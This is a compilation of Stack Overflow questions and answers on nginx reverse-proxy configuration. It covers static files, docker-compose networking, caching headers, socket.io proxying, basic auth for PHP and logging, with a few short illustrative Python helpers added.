Well, after letting this question sit on Stack Overflow for some time, I tried to spin up a virtual machine on my computer, created a config file with the exact same content, copy-pasted from my Windows machine to my Linux machine, uploaded the file to my Linux server, and it worked. So in short, Windows screwed with the content of the file without my being able to see anything. I have uploaded a working version of the file here: https://s3-eu-west-1.amazonaws.com/topswagcode.dev/default | I am trying to set up Nginx for my ASP.NET Core WebAPI, but I keep running into errors. When I try to check my config I get:
nginx: [emerg] unknown directive "server" in /etc/nginx/sites-enabled/default:1
nginx: configuration file /etc/nginx/nginx.conf test failed

I have tried to look at the following issues: nginx: [emerg] "http" directive is not allowed here in /etc/nginx/sites-enabled/default:1 and nginx: [emerg] unknown directive " " in /etc/nginx/sites-enabled/example.com:3.

My default config looks like the following:

server {
listen 80;
location / {
proxy_pass http://localhost:5000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection keep-alive;
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}

Installing Nginx and going to the default Nginx server on port 80 works fine, but when I start to upload my own configs and make changes it breaks.

Steps:

sudo chown ubuntu:ubuntu /etc/nginx/sites-available/default

so I can use SCP to upload a new default site:

scp -o StrictHostKeyChecking=no -i {pemFile} -qrp C:/path/. ubuntu@{hostname}:/etc/nginx/sites-available/

Both https://garywoodfine.com/deploying-net-core-application-to-aws-lightsail/ and https://learn.microsoft.com/en-us/aspnet/core/host-and-deploy/linux-nginx?view=aspnetcore-3.0 seem pretty similar, without any results. | nginx: [emerg] unknown directive "server" in /etc/nginx/sites-enabled/default:1
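A common cause of an "unknown directive" error on line 1 after editing a config on Windows is an invisible UTF-8 BOM or smart quotes pasted into the file, which matches the "Windows screwed with the content" diagnosis in the answer. A quick way to check for those bytes (an illustrative helper, not part of the original setup):

```python
def find_config_gremlins(data: bytes):
    """Report invisible Windows-editor artifacts that commonly break nginx configs."""
    problems = []
    if data.startswith(b"\xef\xbb\xbf"):
        problems.append("UTF-8 BOM before the first directive")
    if b"\r\n" in data:
        problems.append("CRLF line endings")
    # Curly quotes as produced by word processors, UTF-8 encoded.
    for smart in (b"\xe2\x80\x9c", b"\xe2\x80\x9d", b"\xe2\x80\x99"):
        if smart in data:
            problems.append("smart quote byte sequence %r" % smart)
    return problems

sample = b"\xef\xbb\xbfserver {\r\n listen 80;\r\n}\r\n"
print(find_config_gremlins(sample))
```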
If anyone is interested in the solution: I had to explicitly set a location block for the static files.

server {
listen 80;
server_name demo.cerebral.local;
#ssl_certificate /etc/letsencrypt/live/yourdomain.com/fullchain.pem;
#ssl_certificate_key /etc/letsencrypt/live/yourdomain.com/privkey.pem;
#ssl on;
#ssl_session_cache builtin:1000 shared:SSL:10m;
#ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
#ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
#ssl_prefer_server_ciphers on;
gzip on;
gzip_http_version 1.1;
gzip_vary on;
gzip_comp_level 6;
gzip_proxied any;
#gzip_types text/plain text/html text/css application/json application/javascript application/x-javascript text/javascript text/xml application/xml application/rss+xml application/atom+xml application/rdf+xml;
gzip_buffers 16 8k;
gzip_disable "MSIE [1-6].(?!.*SV1)";
#access_log /var/log/nginx/demo.access.log;
# This location block fixed my issue.
location ~* /(css|js|lib) {
root /var/www/demo/wwwroot;
}
location / {
proxy_pass http://localhost:5000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection keep-alive;
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
} | I have a .NET Core 3.0 web application that I want to run on a Debian Buster server. I followed the Microsoft instructions found here. I was able to get Nginx to serve the pages, however none of the styles are showing up.

Config file:

server {
listen 80;
server_name yourdomain.com;
return 301 https://$host$request_uri;
}

server {
listen 80;
server_name demo.cerebral.local;
#ssl_certificate /etc/letsencrypt/live/yourdomain.com/fullchain.pem;
#ssl_certificate_key /etc/letsencrypt/live/yourdomain.com/privkey.pem;
#ssl on;
#ssl_session_cache builtin:1000 shared:SSL:10m;
#ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
#ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4;
#ssl_prefer_server_ciphers on;
gzip on;
gzip_http_version 1.1;
gzip_vary on;
gzip_comp_level 6;
gzip_proxied any;
#gzip_types text/plain text/html text/css application/json application/javascript application/x-javascript text/javascript text/xml application/xml application/rss+xml application/atom+xml application/rdf+xml;
gzip_buffers 16 8k;
gzip_disable "MSIE [1-6].(?!.*SV1)";
#access_log /var/log/nginx/demo.access.log;
location / {
proxy_pass http://localhost:5000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection keep-alive;
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}

I am not sure what I am doing wrong. Please push me in the right direction. | .Net Core 3.0 Nginx not serving static files
You may consider forever or supervisor. Check this blog post on the same. | I have a React + Node app which I need to deploy. I am using nginx to serve my front end, but I am not sure what to use to keep my Node.js server running in production. The project is hosted on a Windows VM. I cannot use pm2 due to license issues. I have no idea if running the server using nodemon in production is good or not. I have never deployed an app in production, hence I have no idea about appropriate methods. | Running NodeJS server in production
"The docker compose documentation specifies that links is deprecated and should be replaced with depends_on."

It does not. The docs only say that links also expresses dependency between services in the same way as depends_on, so it determines the order of service startup. I fail to see how this concludes that you should use depends_on instead of links. Instead, they say that if you need to run something in one container only after another container is up, you should use depends_on, not links (for example, if the command of your php container runs migrations, it needs to wait for the postgres container).

On the other hand, links has a warning saying: "Unless you absolutely need to continue using it, we recommend that you use user-defined networks to facilitate communication between two containers instead of using --link." In this context, --link for the docker CLI is the same thing as links in docker-compose.yml.

Now, to the point: if you have your containers on one network, you do not need any further special configuration. Unless you specify otherwise, the default network driver is bridge. So, if you specify your docker-compose.yml as follows, you should have all your containers on one network and aware of each other automatically.

version: "3.1"
services:
nginx:
image: nginx:alpine
ports:
- "8000:80"
volumes:
- ./php/content:/srv/www/content
- ./static:/srv/www/static
- ./nginx/default.conf:/etc/nginx/conf.d/default.conf
nodejs:
image: node:alpine
environment:
NODE_ENV: production
working_dir: /home/app
restart: always
volumes:
- ./nodejs:/home/app
command: ["node", "index"]
php:
image: php:apache
volumes:
- ./php:/var/www/html

In this case nginx should work with

location / {
    try_files $uri @nodejs;
}

and

location /api {
    rewrite ^([^.\?]*[^/])$ $1/ break;
    proxy_pass http://php:80;
}

with the named location from your config updated the same way, service name instead of alias:

location @nodejs {
    proxy_pass http://nodejs:8080;
}
services:
nginx:
image: nginx:alpine
ports:
- "8000:80"
volumes:
- ./php/content:/srv/www/content
- ./static:/srv/www/static
- ./nginx/default.conf:/etc/nginx/conf.d/default.conf
links:
- php:php-app
- nodejs:nodejs-app
nodejs:
image: node:alpine
environment:
NODE_ENV: production
working_dir: /home/app
restart: always
volumes:
- ./nodejs:/home/app
links:
- php:php-app
command: ["node", "index"]
php:
image: php:apache
volumes:
- ./php:/var/www/html

The related nginx default.conf:

server {
listen 80;
root /srv/www;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
location / {
try_files $uri @nodejs;
}
location /api {
rewrite ^([^.\?]*[^/])$ $1/ break;
proxy_pass http://php-app:80;
}
location @nodejs {
proxy_pass http://nodejs-app:8080;
}
}

The links instructions make aliases from the docker service names to the proxy_pass names in the nginx conf. How is it possible to replace the links instructions in the docker-compose file with depends_on without modifying the nginx config (and keep the aliases)? | how to replace `links` with `depends_on` in a docker-compose file?
The nginx.conf code you have is a bit confusing and incomplete, because you don't actually show any code that does the actual serving of https, so it's unclear how the whole setup would be working at all.

The proxy_redirect should generally be left at its default value of default, unless you specifically know what you want to change it to; see the documentation at http://nginx.org/r/proxy_redirect.

The conditional redirect, e.g., if ( $http_x_forwarded_proto != 'https' ) { return 307 https://$host$request_uri; }, would normally only be needed on your backend; it's unclear why you'd have this in your nginx, unless you have another nginx in front of it, which would be kinda redundant and likely unnecessary.

Finally, your main concern is that HTTP status codes may be returned without status "names". First of all, status code "names", like Moved Temporarily after 302, or Created after 201, aren't really essential to anything, so even in the unlikely event that they're missing (it's not very clear why they'd be missing with nginx in the first place, and you provided no further details to enable troubleshooting), it shouldn't really affect any other functionality anyway. But, again, there's no proof that it's nginx that causes them to be missing; in fact, nginx does define "201 Created" in the ngx_http_status_lines array of strings within src/http/ngx_http_header_filter_module.c.

However, a related issue regarding HTTP status codes came up in the mailing lists recently ("Re: prevent nginx from translate 303 responses (see other) to 302 (temporary redirect)"), and it was pointed out that putting nginx in front of your backend may by default cause a downgrade from HTTP/1.1 to HTTP/1.0, as per http://nginx.org/r/proxy_http_version, which may cause your non-nginx backend to handle HTTP differently to comply with the 1.0 spec; the solution would be to add proxy_http_version 1.1 to nginx.
| I'm using Nginx to redirect all HTTP requests to HTTPS in my Spring Boot application. This is the nginx configuration that I'm using. With that I was able to redirect all requests to HTTPS, but when I do, the status code is returned correctly yet it doesn't have the status code name anymore. If I remove nginx and run the Spring Boot application alone I get the HTTP status with both its code name and code.

server {
listen 80 default_server;
listen [::]:80 default_server;
server_name _ ;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
if ( $http_x_forwarded_proto != 'https' ) {
return 307 https://$host$request_uri;
}
location / {
proxy_set_header X-Forwarded-Proto http;
proxy_pass http://localhost:7070;
expires -1;
}
}

What am I doing wrong here? Should I use proxy_redirect instead of proxy_pass, or am I missing anything here? It'd be great if you can help. | HTTP status code names are missing when using Nginx
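For reference, the reason phrases discussed above are standardized per status code, and clients are required to ignore them, which is why losing them is harmless. Python's http module tabulates the same canonical phrases; this is shown only to illustrate that the name is derivable from the code:

```python
from http import HTTPStatus

# Each status code has a canonical reason phrase defined by the HTTP RFCs.
for code in (200, 201, 302, 307):
    status = HTTPStatus(code)
    print(code, status.phrase)
```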
In order for the backend application server https://example.com to generate 304 responses it will need to see the If-Modified-Since request header. In your case that header is getting to nginx but not to the application server. You need to tell nginx to pass it through. Add the following to your location block:

proxy_set_header If-Modified-Since $http_if_modified_since;

Remove if_modified_since before and add_header Last-modified. Those lines are not helpful, because Last-Modified needs to be generated by the application server, rather than by your nginx proxy.

It may be possible for the nginx proxy to take charge of whether to send 304, by unconditionally querying the application server (and doing all the work entailed in generating a response) and then deciding whether to send 304 rather than passing on the full response (probably code 200), based on the Last-Modified header in that response, but I can't see any benefit from doing it that way.

The answers given to another question helped me to realise how little the nginx proxy knows about the freshness of dynamic content that it is proxying. | I have a server running nginx that serves a web application built with Ratpack, and I cannot manage to get a 304 response when requesting the website from a browser or with curl.

Nginx conf:

location / {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_set_header X-NginX-Proxy true;
proxy_read_timeout 240;
proxy_pass http://example.com/;
proxy_redirect off;
add_header Last-modified "Wed, 29 Nov 2017 12:56:25";
if_modified_since before;
}

From the browser I always get 200 OK, and with curl I get:

HTTP/1.1 302 Found
Server: nginx/1.6.3
Date: Wed, 29 Nov 2017 14:23:07 GMT
Content-Length: 0
Connection: keep-alive
location: http://example.com/display
Last-Modified: Wed, 29 Nov 2017 12:56:25

I have tried these two curl commands and both give the above response:

curl -I -H "If-Modified-Since: Wed, 29 Nov 2017 14:27:08" -X GET https://example.com
curl -I -H "If-Modified-Since: Wed, 29 Nov 2017 14:27:08" https://example.com

Why am I getting 302 with curl and 200 OK in the browser?
What am I doing wrong? I can see that the browser is making its request with the "If-Modified-Since" header. When I reload the page, resources are loaded from the browser cache, and with a hard reload all resources get a 200 OK. | Nginx does not return 304 for "if-modified-since" header
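Once the backend sees If-Modified-Since, the 304 decision is just a date comparison against the resource's Last-Modified time. A minimal sketch of that logic (Python used for illustration; this is not code from the Ratpack application):

```python
from email.utils import parsedate_to_datetime

def status_for(if_modified_since: str, last_modified: str) -> int:
    """Return 304 if the resource has not changed since the client's cached copy."""
    client_time = parsedate_to_datetime(if_modified_since)
    resource_time = parsedate_to_datetime(last_modified)
    return 304 if resource_time <= client_time else 200

print(status_for("Wed, 29 Nov 2017 14:27:08 GMT",
                 "Wed, 29 Nov 2017 12:56:25 GMT"))
```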
Note that this is spelled out in the documentation:

Times of several responses are separated by commas and colons like addresses in the $upstream_addr variable.

This means that it made multiple requests to a backend. Most likely you either have a bare proxy_pass host that resolves to different IPs (frequently the case with something like Amazon ELB as an origin), or you have a configured upstream that has multiple servers. Unless disabled, the proxy module will make round-robin attempts against all healthy backends. This can be configured with the proxy_next_upstream_* directives.

For example, if this is not the desired behavior, you can just do:

proxy_next_upstream off; | Sometimes Nginx $upstream_response_time returns 2 values.

xxx.xxx.xxx.xxx - - [08/Nov/2017:23:43:25 +0900] "GET /xxxxxxxxxxxx HTTP/2.0" 200 284 "https://xxxxxxxxxxx" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" "-" "0.015" "0.001, 0.014"

"0.001, 0.014" is the $upstream_response_time.
Why does this have two values?

Log format:

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for" '
'"$request_time" "$upstream_response_time"'; | Q: Nginx $upstream_response_time returns 2 values |
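Given that behavior, a log parser has to treat $upstream_response_time as a list of per-attempt timings rather than a single number. A hypothetical helper splitting on the commas and colons mentioned in the documentation:

```python
def upstream_times(field: str):
    """Split an $upstream_response_time value such as "0.001, 0.014" or
    "0.001 : 0.014" into floats, one per upstream attempt."""
    parts = field.replace(":", ",").split(",")
    return [float(p) for p in parts if p.strip()]

times = upstream_times("0.001, 0.014")
print(times, sum(times))
```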
This worked for me when I ran into this issue:

location / {
#...
try_files $uri $uri/ /index.html$is_args$args;
#...
}

However, I've encountered errors in other projects using *.ejs templates for development builds and *.html plugins for production builds with webpack. The answer to that I found here: React-router issue when refreshing URLs with SSL Enabled. Hope that helps. | This question already has answers here: React Router BrowserRouter leads to "404 Not Found - nginx" error when going to subpage directly without through a home-page click (6 answers). Closed 6 years ago.

I have a react frontend app that uses react-router to create different routes. On the development server it's working fine, but when I build the project it gives me 404 when accessing the different routes directly. The website opens fine with xyz.net, but it gives 404 when I try to access it with xyz.net/login.

Here is my nginx conf:

server {
listen 80;
server_name xyz.net www.xyz.net;
root /root/frontend/react/build/;
index index.html;
location /api/ {
include proxy_params;
proxy_pass http://localhost:8000/;
}
} | Getting 404 with react router app with nginx [duplicate]
The URL that you're using for the client is incorrect:

var socket = io('http://127.0.0.1/socket.io/');

Adding a path (in this case, /socket.io/) has a special meaning in connection strings: it reflects the namespace that you want the client to connect to. Since you're not using namespaces, you should leave it off:

var socket = io('http://127.0.0.1/');
// Or possibly even just this:
// var socket = io(); | I have a nicely working Django website which is being served by gunicorn and nginx (as a proxy server). Now I want to add a chat mechanism to that website using socket.io and Node.js. The problem is that the chat works perfectly fine when I connect socket.io directly to the Node.js server (which is listening on port 5000), but when I try to use nginx to proxy the socket.io requests to Node.js it doesn't work.

Here is my nginx file in the /sites-enabled/ dir:

server {
listen 80;
server_name 127.0.0.1;
location = /favicon.ico {
access_log off;
log_not_found off;
}
location /static/ {
root /path/to/static;
}
location / {
include proxy_params;
proxy_pass http://unix:/path/to/file.sock;
}
location /socket.io/ {
proxy_pass http://127.0.0.1:5000;
proxy_redirect off;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
}
}

BTW I am using pm2 to manage nodejs (if it makes any difference).

EDIT:

server.js:
var io = require('socket.io').listen(5000);
var fs = require('fs');
io.on('connection', function(socket){
console.log('connected');
socket.on('question', function(data){
console.log(data);
soc.emit('question', data);
});
socket.on('advice', function(data){
console.log(data);
soc.emit('advice', data);
});
socket.on('disconnect', function(){
console.log('disconnected');
});
});
client.js
var socket = io('http://127.0.0.1/socket.io/');
socket.on('question', function(data){
console.log(data);
});
socket.on('advice', function(data){
console.log(data);
});
$('#send').click(function() {
var msg = $('#msg').val();
if (msg == '') {$('#msg').focus();}
else{
data = {msg:msg};
socket.emit('question', data);
var msg = $('#msg').val('').focus();
}
}); | Socket.io not working with nginx |
I figured out a solution that involves the steps below:

1. Serve the static login page using Nginx.
2. Forward the login credentials to the NodeJS server, where authentication is handled and the auth token is stored in the response cookie (http-only). Send this response, with the cookie set, to the client.
3. Once the client receives the authentication message, on success request the secure webapp page. This request will carry the auth cookie along with itself.
4. Again forward the request to the NodeJS server from Nginx, validate the token, and set the X-Accel-Redirect header with the path where to look for the secure file on the NodeJS server.

While using X-Accel-Redirect, special care needs to be taken with the Mime-Type of the response:

- CSS needs to be served with text/css
- images need to be served with image/jpeg
- HTML content should be served with text/html | Context:

I'm trying to build a webapp with Nginx acting as the front-end server and also as a proxy to my NodeJS server in the backend. I want to restrict access to the functional part of the webapp via a proper authentication mechanism. The authentication logic is handled by the NodeJS server and uses JWTs.

Current flow:

1. The static login page is shown to the user, served by Nginx.
2. User credentials are sent to the Nginx server and forwarded to the NodeJS server, which handles the login logic and on successful authentication sends back a JWT. (All www.baseurl.com/api requests are being forwarded to the NodeJS server.)
3. The JWT is stored in localStorage of the client browser (a recommendation by the Auth0 team) and then I want to redirect the user to the functional webapp page (say /home).
4. For the redirect, I request the /api/home page from the Nginx server with my JWT token. This request is forwarded to NodeJS for validation of the token.
Once validated, I need to serve the webapp's functional home page, which is a mixture of .html, .css, and .js files. Since the page itself is first rendered statically and then makes AJAX requests to load further content, I want to serve this home page from my Nginx server rather than sending the whole HTML string from the NodeJS server. And once the static page is loaded on the client machine, I want to start making requests to the Node server for further page contents depending on the permissions of the user.

Problem statement: How can I achieve this using Node and Nginx? How can Nginx know that NodeJS has validated the user token in step 4 and then serve the static part of the home page? Is this even possible? What is the best recommended way to handle such authentication flows?

PS: I'm using the ExpressJS framework on the server side, and plain html/css/js for the client side (no client-side web frameworks). | Serving static content using Nginx after successful NodeJS authentication
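The MIME types called out at the end of the answer can be derived from the file extension instead of being hard-coded; a sketch of what the Node handler would compute before setting Content-Type alongside X-Accel-Redirect (Python used for illustration; the helper name is hypothetical):

```python
import mimetypes

def accel_content_type(path: str) -> str:
    """Content-Type to send alongside X-Accel-Redirect for a protected file."""
    guessed, _encoding = mimetypes.guess_type(path)
    return guessed or "application/octet-stream"

for name in ("app.css", "logo.jpeg", "home.html"):
    print(name, accel_content_type(name))
```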
I recommend trying the log_format directive with the $realpath_root (or $document_root) and $request_filename variables. Read these docs and customize your logs as you wish:

http://nginx.org/en/docs/http/ngx_http_log_module.html#log_format
http://nginx.org/en/docs/http/ngx_http_core_module.html#variables
https://www.digitalocean.com/community/tutorials/how-to-configure-logging-and-log-rotation-in-nginx-on-an-ubuntu-vps | Right now I've got Nginx set up to serve what I'm pretty sure is a valid filepath. However, it's giving me a 404 Not Found. I've looked in /var/log/nginx/access.log and it shows me:

[05/Oct/2016:19:15:50 -0500] "GET /menu.html HTTP/1.1" 404 571 "-" "Mozilla/5.0 ...

But not what path it was trying to access on localhost, which should be /usr/share/nginx/html/menu.html. How do I configure Nginx to show me this information? | How do I see the actual filepath that nginx is trying to access for a file?
It is usual to place include mime.types; inside the outer http { ... } block, rather than inside a location { ... } block, so that it is system-wide and inherited by all server { ... } blocks and all locations.

Your href="../static/css/ statement is relative, so from the information you provide, we cannot tell whether the URI is being processed by the location /static/ block or the location / block.

You do not have a root (or alias) defined for the location / block, so the false condition of the if (!-f $request_filename) statement will probably always fail with 404.

You may want to set root /var/www/test/my-example in the server { ... } block and allow it to be inherited by some location blocks. The use of alias where a root can be used is discouraged - see this document.

If your CSS files are being served through the proxy_pass http://test_server; then this is the wrong place to be fixing the MIME type. | I use nginx, I have included mime.types, and I keep getting an error when I try to access my css files. I tried inserting "include /etc/nginx/mime.types;" in "location /" but it didn't work. This is my nginx.conf:

user www-data;
worker_processes 4;
pid /run/nginx.pid;
events {
worker_connections 768;
# multi_accept on;
}
http {
server_names_hash_bucket_size 64;
upstream test_server {
server unix:/var/www/test/run/gunicorn.sock fail_timeout=10s;
}
server {
listen 80;
server_name ec2-#-#-#-#.sa-east-1.compute.amazonaws.com;
client_max_body_size 4G;
access_log /var/www/test/logs/nginx-access.log;
error_log /var/www/test/logs/nginx-error.log warn;
location /static/ {
autoindex on;
alias /var/www/test/my-example/static/;
include /etc/nginx/mime.types;
}
location /media/ {
autoindex on;
alias /var/www/test/my-example/media/;
}
location / {
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_redirect off;
if (!-f $request_filename) {
proxy_pass http://test_server;
break;
}
}
#For favicon
location /favicon.ico {
alias /var/www/test/test/static/img/favicon.ico;
}
#For robots.txt
location /robots.txt {
alias /var/www/test/test/static/robots.txt ;
}
# Error pages
error_page 500 502 503 504 /500.html;
location = /500.html {
root /var/www/test/my-example/static/;
}
}
}

And head of my html:
But I keep having this error: was not loaded because its MIME type, "text/plain", is not "text/css" | CSS was not loaded because its MIME type
I found the solution! The regular expression works, but you need to add a resolver in order to have a variable in the proxy_pass (at least, that's how I understand it).

server {
listen 80;
server_name ~^(?<port_subdomain>[0-9]*)\.example\.com$;
location / {
resolver 10.33.1.1; #/etc/resolv.conf
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $host;
proxy_http_version 1.1;
proxy_pass http://example.com:$port_subdomain;
}
} | I'm trying to use nginx to redirect to ports (running nodeJS apps) based on the domain prefix. So far, I can redirect:

example.com:80 --> port 8502
5555.example.com:80 --> port 5555
6666.example.com:80 --> port 6666

Is there a way to do this kind of redirection without having to copy-paste this over and over?

server {
listen 80;
server_name 5555.example.com;
location / {
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $host;
proxy_http_version 1.1;
proxy_pass http://example.com:5555;
}
}

I figured I should do this with regular expressions, so I tried the following, without any success:

~^(?<theport>.+)\.example\.com$ #then changed proxy_pass to http://example.com:$theport
~^([0-9]+)\.example\.com$ #then changed proxy_pass to http://example.com:$1
server_name "~^([0-9]{4})\.example\.com$";
set $theport $1; #then changed proxy_pass to http://example.com:$theportIn all cases, I'm getting a "502 Bad Gateway" error. | nginx : redirect to port according to domain prefix (dynamically) |
More simple way is hookconsole.logand callconsole.logas usually.var util = require('util');
var JFile = require("jfile");
var nxFile = new JFile('/var/log/nginx/access.log');
...
process.stdout.write = (function(write) {
return function(text, encoding, fd) {
write.apply(process.stdout, arguments); // write to console
nxFile.text += util.format.apply(process.stdout, arguments) + '\n'; // write to nginx
}
})(process.stdout.write);Also you can define hook toconsole.errorby changestdouttostrerrin code above.P.S. I don't have nginx to verify code. So code can contains errors :) | I have an Node.js app setting up with systemd. The app running behind NGINX.I would like to add console output of my Node.js application in the log access NGINX file ?How can I do this ?Thanks in advance. | How to add console outputs Node.js app in the log access NGINX file? |
No - you cannot do this at the Django level. The contents ofHttpRequest.METAareobtained directly from the WSGI handler. The structure of this object is defined in theWSGI specification.The request headers are adicteven before Django gets anywhere near them - your WSGI handler (uwsgi/gunicorn/weurkzeug in development) is what parses the headers and passes thedictto your Django application. Django has no knowledge of the original, raw, request headers.The only place to get the raw request would be at web server (Nginx/Apache etc) level. I know you can log these with Nginx - although you would be logging a substantial amount of data. | Is there any way to get the full unprocessed HTTP request headers in django (hosted on elastic beanstalk?)I would like to be able to analyze the ordering of the headers in particular, so unfortunatelyHttpRequest.METAdoes not suffice for my use case. | Get raw request headers in django |
from:https://forum.nginx.org/read.php?2,1680,248005#msg-248005This is not a problem to solve, it's just information messages logged
by nginx. If it's too verbose for you, consider tuning error_log
logging level, seehttp://nginx.org/r/error_log.-- Maxim Douninhttp://nginx.org/although for my 2 cents, I'm not sure closing a HTTP/1.1 connection should be "info", more like "debug".The "in pairs" would be your browser making more than one connection to your server (as is normal). You can verify the number of connections with the developer tools on your browser (under network).Cameron | Invar/log/nginx/https-error_logandvar/log/nginx/http-error_log, I see tens of millions of errors (aggregated over the past several months):client xx.xx.xxx.xxx closed keepalive connectionFrequently (but not always) they exist in pairs with the same IP address and timestamp even, e.g.:2016/07/12 19:24:59 [info] 44815#0: *82924 client 82.145.210.66 closed keepalive connection
2016/07/12 19:24:59 [info] 44821#0: *83275 client 82.145.210.66 closed keepalive connectionI.e. it seems the same person closed the connection twice at the same point in time? I feel something untoward is going on here. I'm using nginx as a reverse proxy in front of gunicorn (it's a Django app). Can anyone with expertise help me troubleshoot this issue, or speculate what it could be? Alternatively, is it something I shouldn't worry about? | keep alive errors seen in nginx logs |
There are only a limited number of directives that are allowed within anifcontext innginx. This is related to the fact thatifis part of therewritemodule; as such, within its context, you can only use the directives that are specifically outlined within the documentation of the module.The common way around this "limitation" is to build up state using intermediate variables, and then use directives likeproxy_set_headerusing such intermediate variables:set $xci $http_x_client_id;
if ($cookie_header_x_client_id) {
set $xci $cookie_header_x_client_id;
}
proxy_set_header x-client-id $xci; | Is there a way to check if a specific cookie exist innginx?For now I have a section like below to set header from cookie:proxy_set_header x-client-id $cookie_header_x_client_id;I want to check if that cookie exist then set the header, otherwise do not override header.I've tried:if ($cookie_header_x_client_id) {
proxy_set_header x-client-id $cookie_header_x_client_id;
}But it does not work and gives the error below:"proxy_set_header" directive is not allowed here in /etc/nginx/sites-enabled/website:45Any solution? | How to conditionally override a header in nginx only if a cookie exist? |
The problem is a fundamental misunderstanding as tohownginxprocesses a request. Basically,nginxchooses one location to process a request.You wantnginxto process URIs that begin with/adminin a location block that requiresauth_basic. In addition, URIs that end with.phpneed to be sent to PHP7.So you need two fastcgi blocks, one to process normal PHP files and one to process restricted PHP files.There are several forms oflocationdirective. You have already discovered that the regex locations are ordered and therefore yourlocation "~^/admin/.*$"block effectively prevents thelocation ~ \.php$block from seeing any URI beginning with/adminand ending with.php.A clean solution would be to use nested location blocks and employ the^~modifier which forces a prefix location to take precedence over a regex location:location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
try_files $uri =404;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
}
location ^~ /admin/ {
auth_basic "Restricted";
auth_basic_user_file /etc/nginx/.htpasswd;
try_files $uri $uri/ =404;
location ~ \.php$ {
try_files $uri =404;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
}
}Note thatlocation ^~is a prefix location and not a regex location.Note also that thefastcgi_split_path_infoandfastcgi_indexdirectives are not required in alocation ~ \.php$block. | In aprevious question,I was trying to password protect my /admin/ and sub-folders directory using Nginx with .htpasswd and regex.That was done successfully, but now, after password authentication was completed, Nginx prompts to "download" php files, rather than simply loading them.This doesn't happen when the new location "authentication" block is commented out. For instance, in this code sample, PHP pages load without any issue:location / {
try_files $uri $uri/ =404;
}
#location "~^/admin/.*$" {
# try_files $uri $uri/ =404;
# auth_basic "Restricted";
# auth_basic_user_file /etc/nginx/.htpasswd;
#}
location ~ \.php$ {
try_files $uri =404;
fastcgi_split_path_info ^(.+\.php)(/.+)$;
fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
How can I resolve these (apparently conflicting) location blocks, so the /admin/ section is password protected yet php files still load? | Nginx successfully password protects PHP files, but then prompts you to download them
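The precedence rule the answer relies on can be reduced to a tiny sketch (illustrative only, not part of the fix): with ^~, the prefix location wins and the regex location is never consulted for matching URIs.

```nginx
# A request for /admin/test.php hits the ^~ prefix block (401);
# only URIs outside /admin/ can reach the regex block.
location ^~ /admin/ { return 401; }
location ~ \.php$   { return 200 "php"; }
```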
You could try and change the nginx log level with:
access_log off;
The goal remains to modify the nginx.conf used by the nginx image. | I'm running nginx and unicorn in a docker container managed by supervisord. So, supervisord is the docker command. It in turn spawns nginx and unicorn. Unicorn talks to nginx over a socket. nginx listens on port 80. I also have a logspout docker container running, basically piping all the docker logs to papertrail by listening to docker.sock. The problem is nginx is constantly spewing thousands of mundane entries to the logs:
172.31.45.231 - - [25/May/2016:05:53:33 +0000] "GET / HTTP/1.0" 200 12961 0.0090
I'm trying to disable it. So far I've:
- set access_logs /dev/null; in nginx.conf and vhost files.
- tried to tell supervisord to stop logging the requests:
[program:nginx]
command=bash -c "/usr/sbin/nginx -c /etc/nginx/nginx.conf"
stdout_logfile=/dev/null
stderr_logfile=/dev/null
- tried to tell supervisord to send the logs to syslog not stdout:
[program:nginx]
command=bash -c "/usr/sbin/nginx -c /etc/nginx/nginx.conf"
stdout_logfile=syslog
stderr_logfile=syslog
- set the log level in Unicorn to Warn in the rails code, and via env var.
Full supervisord conf:
[supervisord]
nodaemon=true
loglevel=warn
[program:unicorn]
command=bundle exec unicorn -c /railsapp/config/unicorn.rb
